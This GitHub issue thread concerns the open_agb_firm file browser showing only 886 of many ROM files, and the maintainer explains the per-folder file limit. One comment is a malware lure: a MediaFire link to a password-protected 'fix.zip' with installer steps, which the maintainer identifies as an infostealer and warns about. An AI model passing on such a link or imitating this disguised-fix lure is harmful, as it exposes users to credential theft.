### ISSUE TITLE
File Browser Shows Only First 886 Items

### ISSUE THREAD

**Issue by n1zzo** [profi200/open_agb_firm#201]
First of all thanks for the amazing work you're doing here.
I've tried putting a large number of .gba files on my sd card (3190), however only the first 886 are being shown in the menu.
Do you have any idea about why this is happening?

Thanks

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by profi200** [comment]
Just a little warning. If anyone downloaded this file from the hidden comment it's malware:
https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

As for the issue the file browser is limited to 1000 files per folder and if the avergae file name length exceeds a certain length the limit is lower.

**Comment by n1zzo** [comment]
That answer seemed a tad suspect.
Thanks for the reply, I think I’ll work around this by splitting the roms into folders by initial letter.

Thanks!

**Comment by profi200** [comment]
Yes, the bot/compromised account has been reported and everything got deleted. Just wanted to make sure no one ran the infostealer shit that was linked in that deleted post.
